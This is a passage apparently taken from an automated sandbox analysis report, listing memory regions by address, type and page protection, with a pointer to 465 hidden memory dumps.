3070000
|
heap
|
page read and write
|
||
|
7FF848E50000
|
trusted library allocation
|
page read and write
|
||
|
6ECE000
|
stack
|
page read and write
|
||
|
2089012B000
|
heap
|
page read and write
|
||
|
766F000
|
heap
|
page read and write
|
||
|
2B428E1A000
|
trusted library allocation
|
page read and write
|
||
|
76A8000
|
trusted library allocation
|
page read and write
|
||
|
F9B58FE000
|
stack
|
page read and write
|
||
|
8910000
|
trusted library allocation
|
page execute and read and write
|
||
|
5F9D000
|
heap
|
page read and write
|
||
|
330F000
|
remote allocation
|
page execute and read and write
|
||
|
89B0000
|
direct allocation
|
page read and write
|
||
|
5EF8000
|
heap
|
page read and write
|
||
|
311B000
|
heap
|
page read and write
|
||
|
2B4254A6000
|
heap
|
page read and write
|
||
|
7599000
|
heap
|
page read and write
|
||
|
20891E63000
|
heap
|
page read and write
|
||
|
5F5C000
|
heap
|
page read and write
|
||
|
75DD000
|
heap
|
page read and write
|
||
|
2B427501000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F40000
|
trusted library allocation
|
page read and write
|
||
|
2B437368000
|
trusted library allocation
|
page read and write
|
||
|
E30000
|
heap
|
page read and write
|
||
|
2B43F760000
|
heap
|
page read and write
|
||
|
7FAA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7030000
|
direct allocation
|
page read and write
|
||
|
7FF848E60000
|
trusted library allocation
|
page read and write
|
||
|
60F0000
|
direct allocation
|
page read and write
|
||
|
49F5000
|
heap
|
page execute and read and write
|
||
|
208901FE000
|
heap
|
page read and write
|
||
|
87F0000
|
heap
|
page read and write
|
||
|
3110000
|
heap
|
page read and write
|
||
|
20891E7A000
|
heap
|
page read and write
|
||
|
7FF848DE0000
|
trusted library allocation
|
page read and write
|
||
|
8695000
|
trusted library allocation
|
page read and write
|
||
|
8330000
|
heap
|
page read and write
|
||
|
2B42756D000
|
trusted library allocation
|
page read and write
|
||
|
F9B5B78000
|
stack
|
page read and write
|
||
|
DE0000
|
heap
|
page read and write
|
||
|
2B427071000
|
trusted library allocation
|
page read and write
|
||
|
7208000
|
heap
|
page read and write
|
||
|
208901FA000
|
heap
|
page read and write
|
||
|
7FF848BCD000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B43F783000
|
heap
|
page read and write
|
||
|
7730000
|
trusted library allocation
|
page read and write
|
||
|
5EF0000
|
heap
|
page read and write
|
||
|
20891E6E000
|
heap
|
page read and write
|
||
|
214ED000
|
stack
|
page read and write
|
||
|
78C0000
|
trusted library allocation
|
page read and write
|
||
|
82B7000
|
stack
|
page read and write
|
||
|
7850000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D60000
|
trusted library allocation
|
page read and write
|
||
|
4978000
|
trusted library allocation
|
page read and write
|
||
|
6160000
|
direct allocation
|
page read and write
|
||
|
2B427801000
|
trusted library allocation
|
page read and write
|
||
|
8444000
|
heap
|
page read and write
|
||
|
7FF848BDB000
|
trusted library allocation
|
page read and write
|
||
|
2B43F7AA000
|
heap
|
page read and write
|
||
|
CD0000
|
heap
|
page read and write
|
||
|
4A9E000
|
stack
|
page read and write
|
||
|
71EA000
|
heap
|
page read and write
|
||
|
2B43F6E0000
|
heap
|
page read and write
|
||
|
215F0000
|
heap
|
page read and write
|
||
|
2B43F51D000
|
heap
|
page read and write
|
||
|
7FF848BC4000
|
trusted library allocation
|
page read and write
|
||
|
20891F92000
|
heap
|
page read and write
|
||
|
2B426E50000
|
trusted library allocation
|
page read and write
|
||
|
49F0000
|
heap
|
page execute and read and write
|
||
|
2142F000
|
stack
|
page read and write
|
||
|
2B4257C0000
|
heap
|
page read and write
|
||
|
5F63000
|
heap
|
page read and write
|
||
|
7FF848DC0000
|
trusted library allocation
|
page read and write
|
||
|
2B428F9C000
|
trusted library allocation
|
page read and write
|
||
|
30EA000
|
trusted library allocation
|
page execute and read and write
|
||
|
6170000
|
direct allocation
|
page read and write
|
||
|
20891E62000
|
heap
|
page read and write
|
||
|
8400000
|
heap
|
page read and write
|
||
|
30B0000
|
trusted library allocation
|
page read and write
|
||
|
2B43F600000
|
heap
|
page read and write
|
||
|
2B43F604000
|
heap
|
page read and write
|
||
|
7FF848BD0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E90000
|
trusted library allocation
|
page read and write
|
||
|
20891E86000
|
heap
|
page read and write
|
||
|
30A0000
|
trusted library section
|
page read and write
|
||
|
20890100000
|
heap
|
page read and write
|
||
|
7740000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848F20000
|
trusted library allocation
|
page read and write
|
||
|
2089012F000
|
heap
|
page read and write
|
||
|
61F0000
|
heap
|
page read and write
|
||
|
208901E8000
|
heap
|
page read and write
|
||
|
20891FCE000
|
heap
|
page read and write
|
||
|
208901CD000
|
heap
|
page read and write
|
||
|
5F64000
|
heap
|
page read and write
|
||
|
3040000
|
heap
|
page read and write
|
||
|
6110000
|
direct allocation
|
page read and write
|
||
|
2182E000
|
stack
|
page read and write
|
||
|
5F63000
|
heap
|
page read and write
|
||
|
8463000
|
heap
|
page read and write
|
||
|
4B40000
|
heap
|
page read and write
|
||
|
780E000
|
stack
|
page read and write
|
||
|
E39000
|
heap
|
page read and write
|
||
|
20891FB5000
|
heap
|
page read and write
|
||
|
2B43F75A000
|
heap
|
page read and write
|
||
|
8600000
|
trusted library allocation
|
page read and write
|
||
|
218BC000
|
stack
|
page read and write
|
||
|
7FF848BC3000
|
trusted library allocation
|
page execute and read and write
|
||
|
20891E86000
|
heap
|
page read and write
|
||
|
2B427297000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E30000
|
trusted library allocation
|
page read and write
|
||
|
20891F83000
|
heap
|
page read and write
|
||
|
6120000
|
direct allocation
|
page read and write
|
||
|
2B425420000
|
heap
|
page read and write
|
||
|
5FA8000
|
heap
|
page read and write
|
||
|
2B4254B1000
|
heap
|
page read and write
|
||
|
F9B698E000
|
stack
|
page read and write
|
||
|
2B428DF0000
|
trusted library allocation
|
page read and write
|
||
|
2B425477000
|
heap
|
page read and write
|
||
|
20891E86000
|
heap
|
page read and write
|
||
|
71F8000
|
heap
|
page read and write
|
||
|
30C4000
|
trusted library allocation
|
page read and write
|
||
|
792B000
|
stack
|
page read and write
|
||
|
20891E50000
|
heap
|
page read and write
|
||
|
5F63000
|
heap
|
page read and write
|
||
|
75A0000
|
heap
|
page read and write
|
||
|
2B43F72E000
|
heap
|
page read and write
|
||
|
8940000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DA7000
|
trusted library allocation
|
page read and write
|
||
|
F9B5E3E000
|
stack
|
page read and write
|
||
|
20891E52000
|
heap
|
page read and write
|
||
|
4A00000
|
heap
|
page read and write
|
||
|
F9B55EF000
|
stack
|
page read and write
|
||
|
2B43F440000
|
heap
|
page read and write
|
||
|
F9B59FE000
|
stack
|
page read and write
|
||
|
2B4253F0000
|
heap
|
page read and write
|
||
|
F9B54E3000
|
stack
|
page read and write
|
||
|
785BDFE000
|
stack
|
page read and write
|
||
|
89A0000
|
direct allocation
|
page read and write
|
||
|
2FF0000
|
direct allocation
|
page read and write
|
||
|
2B426EE0000
|
trusted library allocation
|
page read and write
|
||
|
5F67000
|
heap
|
page read and write
|
||
|
7664000
|
heap
|
page read and write
|
||
|
2B428E07000
|
trusted library allocation
|
page read and write
|
||
|
D60000
|
heap
|
page read and write
|
||
|
7FF848EC0000
|
trusted library allocation
|
page read and write
|
||
|
2B428E2D000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
|
20890162000
|
heap
|
page read and write
|
||
|
4ADF000
|
stack
|
page read and write
|
||
|
7FF848E80000
|
trusted library allocation
|
page read and write
|
||
|
2B426F30000
|
heap
|
page read and write
|
||
|
F9B556E000
|
stack
|
page read and write
|
||
|
83D0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F30000
|
trusted library allocation
|
page read and write
|
||
|
20890193000
|
heap
|
page read and write
|
||
|
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
|
2B43F430000
|
heap
|
page execute and read and write
|
||
|
883C000
|
stack
|
page read and write
|
||
|
20891E58000
|
heap
|
page read and write
|
||
|
20891E63000
|
heap
|
page read and write
|
||
|
2B43F505000
|
heap
|
page read and write
|
||
|
2B425825000
|
heap
|
page read and write
|
||
|
5CF5000
|
trusted library allocation
|
page read and write
|
||
|
82C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
20891EB7000
|
heap
|
page read and write
|
||
|
2FD0000
|
heap
|
page readonly
|
||
|
784D000
|
stack
|
page read and write
|
||
|
2B428E88000
|
trusted library allocation
|
page read and write
|
||
|
5B0F000
|
remote allocation
|
page execute and read and write
|
||
|
2B4257E5000
|
heap
|
page read and write
|
||
|
D11000
|
heap
|
page read and write
|
||
|
2B4274E9000
|
trusted library allocation
|
page read and write
|
||
|
7FF848ED0000
|
trusted library allocation
|
page read and write
|
||
|
2B427060000
|
heap
|
page execute and read and write
|
||
|
2B4270F7000
|
trusted library allocation
|
page read and write
|
||
|
785C2FE000
|
stack
|
page read and write
|
||
|
8920000
|
trusted library allocation
|
page read and write
|
||
|
2186F000
|
stack
|
page read and write
|
||
|
5F9D000
|
heap
|
page read and write
|
||
|
49CC000
|
stack
|
page read and write
|
||
|
7780000
|
trusted library allocation
|
page read and write
|
||
|
208901EC000
|
heap
|
page read and write
|
||
|
E35000
|
heap
|
page read and write
|
||
|
76EE000
|
stack
|
page read and write
|
||
|
C78000
|
stack
|
page read and write
|
||
|
51DF000
|
trusted library allocation
|
page read and write
|
||
|
6F0E000
|
stack
|
page read and write
|
||
|
83E0000
|
trusted library allocation
|
page read and write
|
||
|
7860000
|
trusted library allocation
|
page read and write
|
||
|
7880000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F50000
|
trusted library allocation
|
page read and write
|
||
|
D05000
|
heap
|
page read and write
|
||
|
6140000
|
direct allocation
|
page read and write
|
||
|
5BB6000
|
trusted library allocation
|
page read and write
|
||
|
20891F74000
|
heap
|
page read and write
|
||
|
20891F83000
|
heap
|
page read and write
|
||
|
7050000
|
direct allocation
|
page read and write
|
||
|
2B43F950000
|
heap
|
page read and write
|
||
|
20891EB7000
|
heap
|
page read and write
|
||
|
492E000
|
stack
|
page read and write
|
||
|
510F000
|
remote allocation
|
page execute and read and write
|
||
|
20891FB6000
|
heap
|
page read and write
|
||
|
7FF848C7C000
|
trusted library allocation
|
page execute and read and write
|
||
|
20890395000
|
heap
|
page read and write
|
||
|
CDD000
|
heap
|
page read and write
|
||
|
30D9000
|
trusted library allocation
|
page read and write
|
||
|
785C4FB000
|
stack
|
page read and write
|
||
|
7750000
|
trusted library allocation
|
page read and write
|
||
|
844F000
|
heap
|
page read and write
|
||
|
8970000
|
trusted library allocation
|
page read and write
|
||
|
496F000
|
stack
|
page read and write
|
||
|
5FA1000
|
heap
|
page read and write
|
||
|
4B1E000
|
stack
|
page read and write
|
||
|
785C0FE000
|
stack
|
page read and write
|
||
|
6150000
|
direct allocation
|
page read and write
|
||
|
20891E86000
|
heap
|
page read and write
|
||
|
4A4E000
|
stack
|
page read and write
|
||
|
2B427569000
|
trusted library allocation
|
page read and write
|
||
|
2B437359000
|
trusted library allocation
|
page read and write
|
||
|
5B51000
|
trusted library allocation
|
page read and write
|
||
|
78A0000
|
trusted library allocation
|
page read and write
|
||
|
30F2000
|
trusted library allocation
|
page read and write
|
||
|
470F000
|
remote allocation
|
page execute and read and write
|
||
|
2B428E47000
|
trusted library allocation
|
page read and write
|
||
|
7FF848C80000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B428DF3000
|
trusted library allocation
|
page read and write
|
||
|
2B4254AF000
|
heap
|
page read and write
|
||
|
745F000
|
stack
|
page read and write
|
||
|
F9B5BBE000
|
stack
|
page read and write
|
||
|
25630000
|
direct allocation
|
page read and write
|
||
|
7FF848BC2000
|
trusted library allocation
|
page read and write
|
||
|
5FA1000
|
heap
|
page read and write
|
||
|
5F36000
|
heap
|
page read and write
|
||
|
4A08000
|
heap
|
page read and write
|
||
|
78E0000
|
trusted library allocation
|
page read and write
|
||
|
2B428ED8000
|
trusted library allocation
|
page read and write
|
||
|
7FF848BC0000
|
trusted library allocation
|
page read and write
|
||
|
8310000
|
trusted library allocation
|
page execute and read and write
|
||
|
F9B5FBB000
|
stack
|
page read and write
|
||
|
A7AF000
|
direct allocation
|
page execute and read and write
|
||
|
30E0000
|
trusted library allocation
|
page read and write
|
||
|
20891F75000
|
heap
|
page read and write
|
||
|
7770000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D71000
|
trusted library allocation
|
page read and write
|
||
|
2168C000
|
stack
|
page read and write
|
||
|
2F80000
|
heap
|
page read and write
|
||
|
7FF848D7A000
|
trusted library allocation
|
page read and write
|
||
|
2B43F5B0000
|
heap
|
page execute and read and write
|
||
|
2B437091000
|
trusted library allocation
|
page read and write
|
||
|
2B427C13000
|
trusted library allocation
|
page read and write
|
||
|
208901E4000
|
heap
|
page read and write
|
||
|
F9B6A0D000
|
stack
|
page read and write
|
||
|
5B79000
|
trusted library allocation
|
page read and write
|
||
|
8620000
|
trusted library allocation
|
page read and write
|
||
|
20891E62000
|
heap
|
page read and write
|
||
|
7492000
|
heap
|
page read and write
|
||
|
785BAFE000
|
stack
|
page read and write
|
||
|
208901CD000
|
heap
|
page read and write
|
||
|
F9B5DBE000
|
stack
|
page read and write
|
||
|
7080000
|
direct allocation
|
page read and write
|
||
|
8980000
|
direct allocation
|
page read and write
|
||
|
741E000
|
stack
|
page read and write
|
||
|
208900A0000
|
heap
|
page read and write
|
||
|
76A0000
|
trusted library allocation
|
page read and write
|
||
|
20891E77000
|
heap
|
page read and write
|
||
|
82D0000
|
trusted library allocation
|
page read and write
|
||
|
2164D000
|
stack
|
page read and write
|
||
|
2B437080000
|
trusted library allocation
|
page read and write
|
||
|
2B426EA0000
|
trusted library allocation
|
page read and write
|
||
|
8488000
|
heap
|
page read and write
|
||
|
2FC0000
|
heap
|
page read and write
|
||
|
7090000
|
direct allocation
|
page read and write
|
||
|
7FF848C76000
|
trusted library allocation
|
page read and write
|
||
|
2B43F787000
|
heap
|
page read and write
|
||
|
2B428651000
|
trusted library allocation
|
page read and write
|
||
|
215DF000
|
stack
|
page read and write
|
||
|
887C000
|
stack
|
page read and write
|
||
|
F9B5CB7000
|
stack
|
page read and write
|
||
|
2B42752B000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DA2000
|
trusted library allocation
|
page read and write
|
||
|
2B43F4F6000
|
heap
|
page read and write
|
||
|
8930000
|
trusted library allocation
|
page read and write
|
||
|
217F0000
|
remote allocation
|
page read and write
|
||
|
9DAF000
|
direct allocation
|
page execute and read and write
|
||
|
20890130000
|
heap
|
page read and write
|
||
|
83C0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E40000
|
trusted library allocation
|
page read and write
|
||
|
7020000
|
direct allocation
|
page read and write
|
||
|
20891E6B000
|
heap
|
page read and write
|
||
|
208901E4000
|
heap
|
page read and write
|
||
|
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
|
20891E55000
|
heap
|
page read and write
|
||
|
2B427505000
|
trusted library allocation
|
page read and write
|
||
|
3090000
|
trusted library section
|
page read and write
|
||
|
2B425820000
|
heap
|
page read and write
|
||
|
F9B5C37000
|
stack
|
page read and write
|
||
|
7FF848CE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
208901DA000
|
heap
|
page read and write
|
||
|
20891FBC000
|
heap
|
page read and write
|
||
|
30C0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EF0000
|
trusted library allocation
|
page read and write
|
||
|
20890170000
|
heap
|
page read and write
|
||
|
DC2000
|
heap
|
page read and write
|
||
|
20890080000
|
heap
|
page read and write
|
||
|
30F0000
|
trusted library allocation
|
page read and write
|
||
|
5F52000
|
heap
|
page read and write
|
||
|
785C3FF000
|
stack
|
page read and write
|
||
|
7FF848E70000
|
trusted library allocation
|
page read and write
|
||
|
2B437071000
|
trusted library allocation
|
page read and write
|
||
|
2B426E70000
|
trusted library allocation
|
page read and write
|
||
|
20891F70000
|
heap
|
page read and write
|
||
|
6100000
|
direct allocation
|
page read and write
|
||
|
7FF848DF0000
|
trusted library allocation
|
page read and write
|
||
|
5F63000
|
heap
|
page read and write
|
||
|
20891E7A000
|
heap
|
page read and write
|
||
|
F9B5EBE000
|
stack
|
page read and write
|
||
|
20890170000
|
heap
|
page read and write
|
||
|
7FF848D90000
|
trusted library allocation
|
page execute and read and write
|
||
|
7580000
|
heap
|
page read and write
|
||
|
7FF848CA6000
|
trusted library allocation
|
page execute and read and write
|
||
|
217F0000
|
remote allocation
|
page read and write
|
||
|
208901FD000
|
heap
|
page read and write
|
||
|
7870000
|
trusted library allocation
|
page read and write
|
||
|
208901E2000
|
heap
|
page read and write
|
||
|
2F90000
|
heap
|
page read and write
|
||
|
2B43F79C000
|
heap
|
page read and write
|
||
|
2B43F79A000
|
heap
|
page read and write
|
||
|
6F4F000
|
stack
|
page read and write
|
||
|
208901D0000
|
heap
|
page read and write
|
||
|
7606000
|
heap
|
page read and write
|
||
|
89F0000
|
direct allocation
|
page read and write
|
||
|
2B428D44000
|
trusted library allocation
|
page read and write
|
||
|
785BEFF000
|
stack
|
page read and write
|
||
|
83BE000
|
stack
|
page read and write
|
||
|
208901CD000
|
heap
|
page read and write
|
||
|
4BB3000
|
trusted library allocation
|
page read and write
|
||
|
2B4274FD000
|
trusted library allocation
|
page read and write
|
||
|
841A000
|
heap
|
page read and write
|
||
|
218FD000
|
stack
|
page read and write
|
||
|
5FA1000
|
heap
|
page read and write
|
||
|
F9B587E000
|
stack
|
page read and write
|
||
|
20891F90000
|
heap
|
page read and write
|
||
|
2159E000
|
stack
|
page read and write
|
||
|
8432000
|
heap
|
page read and write
|
||
|
21900000
|
direct allocation
|
page read and write
|
||
|
F9B5F3F000
|
stack
|
page read and write
|
||
|
8950000
|
trusted library allocation
|
page read and write
|
||
|
2EDC000
|
stack
|
page read and write
|
||
|
208901CD000
|
heap
|
page read and write
|
||
|
7FF848F00000
|
trusted library allocation
|
page read and write
|
||
|
208901EF000
|
heap
|
page read and write
|
||
|
2B428E16000
|
trusted library allocation
|
page read and write
|
||
|
5EE0000
|
direct allocation
|
page read and write
|
||
|
208901F5000
|
heap
|
page read and write
|
||
|
2B425400000
|
heap
|
page read and write
|
||
|
214AF000
|
stack
|
page read and write
|
||
|
48E0000
|
heap
|
page execute and read and write
|
||
|
844B000
|
heap
|
page read and write
|
||
|
61DE000
|
stack
|
page read and write
|
||
|
2B4254C7000
|
heap
|
page read and write
|
||
|
20890130000
|
heap
|
page read and write
|
||
|
2B4254EF000
|
heap
|
page read and write
|
||
|
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
|
2FC5000
|
heap
|
page read and write
|
||
|
6180000
|
direct allocation
|
page read and write
|
||
|
20891E60000
|
heap
|
page read and write
|
||
|
785B7EA000
|
stack
|
page read and write
|
||
|
78D0000
|
trusted library allocation
|
page read and write
|
||
|
3D0F000
|
remote allocation
|
page execute and read and write
|
||
|
20891EB7000
|
heap
|
page read and write
|
||
|
7FF848C70000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D80000
|
trusted library allocation
|
page execute and read and write
|
||
|
49D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B428E12000
|
trusted library allocation
|
page read and write
|
||
|
3200000
|
remote allocation
|
page execute and read and write
|
||
|
20891E86000
|
heap
|
page read and write
|
||
|
2B427516000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DA5000
|
trusted library allocation
|
page read and write
|
||
|
71E0000
|
heap
|
page read and write
|
||
|
2B43F4F9000
|
heap
|
page read and write
|
||
|
20891A10000
|
heap
|
page read and write
|
||
|
F9B5A7E000
|
stack
|
page read and write
|
||
|
2B43F437000
|
heap
|
page execute and read and write
|
||
|
2B4257E0000
|
heap
|
page read and write
|
||
|
208901D3000
|
heap
|
page read and write
|
||
|
7040000
|
direct allocation
|
page read and write
|
||
|
208901F9000
|
heap
|
page read and write
|
||
|
2B4254F5000
|
heap
|
page read and write
|
||
|
78B0000
|
trusted library allocation
|
page read and write
|
||
|
89E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
C7D000
|
stack
|
page read and write
|
||
|
785C1FE000
|
stack
|
page read and write
|
||
|
49E0000
|
trusted library allocation
|
page read and write
|
||
|
2B425810000
|
trusted library allocation
|
page read and write
|
||
|
2B426E60000
|
heap
|
page readonly
|
||
|
C3C000
|
stack
|
page read and write
|
||
|
2B4275CA000
|
trusted library allocation
|
page read and write
|
||
|
2B428E9C000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
30C3000
|
trusted library allocation
|
page execute and read and write
|
||
|
7DF445700000
|
trusted library allocation
|
page execute and read and write
|
||
|
785BBFE000
|
stack
|
page read and write
|
||
|
83F0000
|
trusted library allocation
|
page read and write
|
||
|
20891E86000
|
heap
|
page read and write
|
||
|
4B51000
|
trusted library allocation
|
page read and write
|
||
|
2B428E84000
|
trusted library allocation
|
page read and write
|
||
|
F9B597C000
|
stack
|
page read and write
|
||
|
48D0000
|
heap
|
page readonly
|
||
|
93AF000
|
direct allocation
|
page execute and read and write
|
||
|
5FA3000
|
heap
|
page read and write
|
||
|
7FF848EE0000
|
trusted library allocation
|
page read and write
|
||
|
F9B5AFE000
|
stack
|
page read and write
|
||
|
20891FCA000
|
heap
|
page read and write
|
||
|
2B426F47000
|
heap
|
page read and write
|
||
|
48C0000
|
trusted library allocation
|
page read and write
|
||
|
D65000
|
heap
|
page read and write
|
||
|
20891FB2000
|
heap
|
page read and write
|
There are 465 hidden memdumps, click here to show them.